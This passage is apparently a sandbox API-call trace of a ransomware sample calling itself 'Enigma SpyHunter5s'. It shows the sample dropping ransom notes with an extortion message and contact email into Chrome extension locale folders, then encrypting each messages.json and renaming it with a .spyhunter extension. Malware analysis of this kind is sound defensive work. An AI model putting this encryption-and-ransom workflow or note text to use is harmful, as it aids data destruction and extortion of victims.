files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0156.847] WriteFile (in: hFile=0xb0, lpBuffer=0x248ebcb*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248ecf4, lpOverlapped=0x0 | out: lpBuffer=0x248ebcb*, lpNumberOfBytesWritten=0x248ecf4*=0x127, lpOverlapped=0x0) returned 1 [0156.847] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0156.847] WriteFile (in: hFile=0xb0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248ecf4, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248ecf4*=0x2ac, lpOverlapped=0x0) returned 1 [0156.848] CloseHandle (hObject=0xb0) returned 1 [0156.848] GetProcessHeap () returned 0x2c0000 [0156.848] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fba3a8 | out: hHeap=0x2c0000) returned 1 [0156.848] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0156.849] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0156.849] WriteFile (in: hFile=0xb0, lpBuffer=0x248ebc7*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248ecf0, lpOverlapped=0x0 | out: lpBuffer=0x248ebc7*, lpNumberOfBytesWritten=0x248ecf0*=0x127, lpOverlapped=0x0) returned 1 [0156.849] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0156.849] WriteFile (in: hFile=0xb0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248ecf0, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248ecf0*=0x2ac, lpOverlapped=0x0) returned 1 [0156.850] CloseHandle (hObject=0xb0) returned 1 [0156.850] GetProcessHeap () returned 0x2c0000 [0156.850] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb9ee0 | out: hHeap=0x2c0000) returned 1 [0156.850] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ec90 | out: pbBuffer=0x248ec90) returned 1 [0156.850] GetProcessHeap () returned 0x2c0000 [0156.850] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0156.850] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248ec88*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248ec88*=0x30) returned 1 [0156.850] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0156.851] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh\\messages.json") returned 164 [0156.851] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0156.851] GetProcessHeap () returned 0x2c0000 [0156.851] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0156.851] ReadFile (in: hFile=0xb0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248ec4c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248ec4c*=0x2800, lpOverlapped=0x0) returned 1 [0156.852] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0156.853] WriteFile (in: hFile=0xb0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248ec4c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248ec4c*=0x2800, lpOverlapped=0x0) returned 1 [0156.853] GetProcessHeap () returned 0x2c0000 [0156.853] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0156.853] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0156.853] WriteFile (in: hFile=0xb0, lpBuffer=0x248ec8c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248ec4c, lpOverlapped=0x0 | out: lpBuffer=0x248ec8c*, lpNumberOfBytesWritten=0x248ec4c*=0x4, lpOverlapped=0x0) returned 1 [0156.853] WriteFile (in: hFile=0xb0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248ec4c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x248ec4c*=0x30, lpOverlapped=0x0) returned 1 [0156.853] CloseHandle (hObject=0xb0) returned 1 [0156.853] GetProcessHeap () returned 0x2c0000 [0156.853] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0156.853] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh\\messages.json.spyhunter") returned 174 [0156.853] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh\\messages.json.spyhunter")) returned 1 [0156.854] GetProcessHeap () returned 0x2c0000 [0156.855] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0156.855] GetProcessHeap () returned 0x2c0000 [0156.855] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0156.855] GetProcessHeap () returned 0x2c0000 [0156.855] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb9d48 | out: hHeap=0x2c0000) returned 1 [0156.855] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\vi\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\vi\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0156.856] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0156.856] WriteFile (in: hFile=0xb0, lpBuffer=0x248ebbf*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248ece8, lpOverlapped=0x0 | out: lpBuffer=0x248ebbf*, lpNumberOfBytesWritten=0x248ece8*=0x127, lpOverlapped=0x0) returned 1 [0156.857] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0156.857] WriteFile (in: hFile=0xb0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248ece8, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248ece8*=0x2ac, lpOverlapped=0x0) returned 1 [0156.857] CloseHandle (hObject=0xb0) returned 1 [0156.857] GetProcessHeap () returned 0x2c0000 [0156.857] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb9bb0 | out: hHeap=0x2c0000) returned 1 [0156.857] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ec88 | out: pbBuffer=0x248ec88) returned 1 [0156.857] GetProcessHeap () returned 0x2c0000 [0156.857] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0156.858] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248ec80*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248ec80*=0x30) returned 1 [0156.858] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\vi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\vi\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0156.858] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\vi\\messages.json") returned 164 [0156.858] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0156.858] GetProcessHeap () returned 0x2c0000 [0156.859] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0156.859] ReadFile (in: hFile=0xb0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248ec44, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248ec44*=0x2800, lpOverlapped=0x0) returned 1 [0157.012] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0157.012] WriteFile (in: hFile=0xb0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248ec44, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248ec44*=0x2800, lpOverlapped=0x0) returned 1 [0157.013] GetProcessHeap () returned 0x2c0000 [0157.013] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0157.013] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0157.013] WriteFile (in: hFile=0xb0, lpBuffer=0x248ec84*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248ec44, lpOverlapped=0x0 | out: lpBuffer=0x248ec84*, lpNumberOfBytesWritten=0x248ec44*=0x4, lpOverlapped=0x0) returned 1 [0157.021] WriteFile (in: hFile=0xb0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248ec44, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x248ec44*=0x30, lpOverlapped=0x0) returned 1 [0157.021] CloseHandle (hObject=0xb0) returned 1 [0157.021] GetProcessHeap () returned 0x2c0000 [0157.021] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0157.021] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\vi\\messages.json.spyhunter") returned 174 [0157.021] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\vi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\vi\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\vi\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\vi\\messages.json.spyhunter")) returned 1 [0157.022] GetProcessHeap () returned 0x2c0000 [0157.022] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0157.022] GetProcessHeap () returned 0x2c0000 [0157.022] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0157.022] GetProcessHeap () returned 0x2c0000 [0157.022] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb99f8 | out: hHeap=0x2c0000) returned 1 [0157.022] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\tr\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\tr\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0157.023] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0157.023] WriteFile (in: hFile=0xb0, lpBuffer=0x248ebb7*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248ece0, lpOverlapped=0x0 | out: lpBuffer=0x248ebb7*, lpNumberOfBytesWritten=0x248ece0*=0x127, lpOverlapped=0x0) returned 1 [0157.024] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0157.024] WriteFile (in: hFile=0xb0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248ece0, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248ece0*=0x2ac, lpOverlapped=0x0) returned 1 [0157.024] CloseHandle (hObject=0xb0) returned 1 [0157.024] GetProcessHeap () returned 0x2c0000 [0157.024] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb9530 | out: hHeap=0x2c0000) returned 1 [0157.024] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ec80 | out: pbBuffer=0x248ec80) returned 1 [0157.024] GetProcessHeap () returned 0x2c0000 [0157.024] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0157.024] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248ec78*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248ec78*=0x30) returned 1 [0157.025] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\tr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\tr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0157.025] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\tr\\messages.json") returned 164 [0157.025] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0157.025] GetProcessHeap () returned 0x2c0000 [0157.025] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0157.025] ReadFile (in: hFile=0xb0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248ec3c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248ec3c*=0x2800, lpOverlapped=0x0) returned 1 [0157.163] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0157.164] WriteFile (in: hFile=0xb0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248ec3c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248ec3c*=0x2800, lpOverlapped=0x0) returned 1 [0157.164] GetProcessHeap () returned 0x2c0000 [0157.164] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0157.164] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0157.164] WriteFile (in: hFile=0xb0, lpBuffer=0x248ec7c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248ec3c, lpOverlapped=0x0 | out: lpBuffer=0x248ec7c*, lpNumberOfBytesWritten=0x248ec3c*=0x4, lpOverlapped=0x0) returned 1 [0157.164] WriteFile (in: hFile=0xb0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248ec3c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x248ec3c*=0x30, lpOverlapped=0x0) returned 1 [0157.164] CloseHandle (hObject=0xb0) returned 1 [0157.164] GetProcessHeap () returned 0x2c0000 [0157.164] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0157.164] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\tr\\messages.json.spyhunter") returned 174 [0157.165] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\tr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\tr\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\tr\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\tr\\messages.json.spyhunter")) returned 1 [0157.166] GetProcessHeap () returned 0x2c0000 [0157.166] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0157.166] GetProcessHeap () returned 0x2c0000 [0157.166] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0157.166] GetProcessHeap () returned 0x2c0000 [0157.166] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb9398 | out: hHeap=0x2c0000) returned 1 [0157.166] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ta\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js 